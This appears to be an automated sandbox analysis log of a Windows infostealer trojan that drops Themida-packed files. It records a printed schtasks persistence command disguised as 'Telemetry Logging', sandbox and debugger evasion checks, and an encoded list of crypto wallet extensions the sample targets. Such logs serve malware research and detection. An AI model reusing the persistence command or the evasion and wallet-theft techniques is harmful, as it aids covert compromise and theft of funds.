          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Setup.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/3@1/2
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: file.exe, 00000000.00000002.422444651.0000000003772000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395041582.0000000004518000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.422490348.0000000003787000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396266361.0000000004673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
          Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: file.exe, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
          Source: 0.0.file.exe.e20000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_01
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeMutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_01
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name: .themida
          Source: Setup.exe.0.drStatic PE information: section name: .boot
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name: .themida
          Source: oobeldr.exe.1.drStatic PE information: section name: .boot
          Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
          Source: file.exeStatic PE information: 0xA8B6B2BE [Thu Sep 11 22:39:58 2059 UTC]
          Source: initial sampleStatic PE information: section name: entropy: 7.309751436693534
          Source: initial sampleStatic PE information: section name: entropy: 7.987178386059639
          Source: initial sampleStatic PE information: section name: entropy: 7.309751436693534
          Source: initial sampleStatic PE information: section name: entropy: 7.987178386059639
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Setup.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Users\user\Desktop\file.exe TID: 5512Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 5840Thread sleep count: 9181 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2860Thread sleep count: 165 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2860Thread sleep time: -37125s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9181Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeSystem information queried: ModuleInformationJump to behavior
          Source: file.exe, 00000000.00000002.412098216.00000000014CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
          Source: file.exe, 00000000.00000002.412098216.00000000014CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000000.00000003.393558543.00000000014C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

          Anti Debugging

          barindex
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess queried: DebugObjectHandleJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess queried: DebugObjectHandleJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Setup.exe "C:\Users\user\AppData\Local\Temp\Setup.exe" Jump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
